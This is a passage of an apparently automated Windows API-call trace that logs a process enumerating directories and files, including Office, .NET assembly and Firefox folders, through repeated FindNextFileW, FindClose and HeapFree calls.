hHeap=0x470000) returned 1 [0319.812] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a56cbe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a56cbe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.0.0.0__89845DCD8080CC91", cAlternateFileName="1100~1.0__")) returned 0 [0319.812] FindClose (in: hFindFile=0x39485a8 | out: hFindFile=0x39485a8) returned 1 [0319.812] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.812] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd2face, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.AnalysisServices.SPClient.Interfaces", cAlternateFileName="MICROS~2.INT")) returned 1 [0319.813] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.813] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd2face, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.0.0.0__89845DCD8080CC91", cAlternateFileName="1100~1.0__")) returned 0 [0319.813] FindClose (in: hFindFile=0x3948428 | out: hFindFile=0x3948428) returned 1 [0319.813] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.813] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22d01df, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.BusinessData", cAlternateFileName="MICROS~1.BUS")) returned 1 [0319.813] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.814] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22d01df, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22d01df, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0319.814] FindClose (in: hFindFile=0x3948768 | out: hFindFile=0x3948768) returned 1 [0319.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.814] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessApplications.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0319.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.814] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0319.814] FindClose (in: hFindFile=0x39485a8 | out: hFindFile=0x39485a8) returned 1 [0319.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.814] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessData", cAlternateFileName="MICROS~2.BUS")) returned 1 [0319.815] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.815] FindNextFileW (in: hFindFile=0x39489e8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0319.815] FindClose (in: hFindFile=0x39489e8 | out: hFindFile=0x39489e8) returned 1 [0319.815] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.815] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d97f24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessData.Intl", cAlternateFileName="MICROS~1.INT")) returned 1 [0319.815] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.815] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d97f24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0319.846] FindClose (in: hFindFile=0x39485a8 | out: hFindFile=0x39485a8) returned 1 [0319.846] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.846] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d97f24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessData.Intl", cAlternateFileName="MICROS~1.INT")) returned 0 [0319.847] FindClose (in: hFindFile=0x39489a8 | out: hFindFile=0x39489a8) returned 1 [0319.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0320.080] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GAC_MSIL", cAlternateFileName="")) returned 0 [0320.080] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0320.080] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0320.080] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="INF", cAlternateFileName="")) returned 1 [0320.081] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0320.081] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc26abeaf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc369dacd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc369dacd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Installer", cAlternateFileName="INSTAL~1")) returned 1 [0320.085] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0320.085] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2f507b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2f507b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2f507b2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-001F-0409-1000-0000000FF1CE}", cAlternateFileName="{90160~3")) returned 1 [0320.086] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0320.087] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc369dacd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc369dacd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc369dacd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-001F-040C-1000-0000000FF1CE}", cAlternateFileName="{90160~4")) returned 1 [0320.185] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0320.185] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc369dacd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc369dacd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc369dacd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-001F-0C0A-1000-0000000FF1CE}", cAlternateFileName="{9B17A~1")) returned 1 [0320.185] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0320.185] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc28c2111, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc28c2111, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc28c2111, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-006E-0409-1000-0000000FF1CE}", cAlternateFileName="{90160~2")) returned 1 [0320.185] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0320.185] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc28c2111, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc28c2111, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc28c2111, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-006E-0409-1000-0000000FF1CE}", cAlternateFileName="{90160~2")) returned 0 [0320.186] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0320.186] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0320.186] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e24d55a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e24d55a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e273816, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PCHEALTH", cAlternateFileName="")) returned 1 [0320.186] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0320.186] FindNextFileW (in: hFindFile=0x39489e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e299a0e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e299a0e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e299a0e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="QSIGNOFF", cAlternateFileName="")) returned 1 [0320.187] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0320.187] FindNextFileW (in: hFindFile=0x39489e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e299a0e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e299a0e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e299a0e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="QSIGNOFF", cAlternateFileName="")) returned 0 [0320.187] FindClose (in: hFindFile=0x39489e8 | out: hFindFile=0x39489e8) returned 1 [0320.187] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0320.187] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e273816, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e299a0e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e299a0e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERRORREP", cAlternateFileName="")) returned 0 [0320.187] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0320.187] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0320.187] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2daddbf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b285e60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b285e60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SHELLNEW", cAlternateFileName="")) returned 1 [0320.187] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0320.187] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2daddbf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b285e60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b285e60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SHELLNEW", cAlternateFileName="")) returned 0 [0320.188] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0320.188] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.191] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0320.191] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0320.191] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.191] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VFS", cAlternateFileName="")) returned 0 [0320.191] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0320.191] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.191] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71a79270, ftCreationTime.dwHighDateTime=0x1d58a28, ftLastAccessTime.dwLowDateTime=0x842aef00, ftLastAccessTime.dwHighDateTime=0x1d5ad9b, ftLastWriteTime.dwLowDateTime=0x842aef00, ftLastWriteTime.dwHighDateTime=0x1d5ad9b, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="totalcmd.exe", cAlternateFileName="")) returned 1 [0320.192] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0320.194] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e68d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9fb0c8e, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9fb0c8e, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft Office 15", cAlternateFileName="MICROS~1")) returned 1 [0320.195] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.195] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x947ac900, ftCreationTime.dwHighDateTime=0x1d57fe9, ftLastAccessTime.dwLowDateTime=0x582a0a0, ftLastAccessTime.dwHighDateTime=0x1d5ea39, ftLastWriteTime.dwLowDateTime=0x582a0a0, ftLastWriteTime.dwHighDateTime=0x1d5ea39, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="filezilla.exe", cAlternateFileName="FILEZI~1.EXE")) returned 1 [0320.195] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0320.195] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe99e772e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xea770616, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea770616, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0320.204] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.204] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd77219, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xedb1a83d, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xedb1a83d, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="features", cAlternateFileName="")) returned 1 [0320.208] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.208] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdc36bc, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xecdc36bc, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb5133d80, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x20853ba, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="omni.ja", cAlternateFileName="")) returned 1 [0320.208] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.208] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xece35df2, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xed7d339e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xed7d339e, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VisualElements", cAlternateFileName="VISUAL~1")) returned 0 [0320.208] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0320.208] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.209] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec033d59, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec033d59, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe2ca280, ftLastWriteTime.dwHighDateTime=0x1d31cde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chrome.manifest", cAlternateFileName="CHROME~1.MAN")) returned 1 [0320.209] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.209] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecc92398, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xeccb8639, 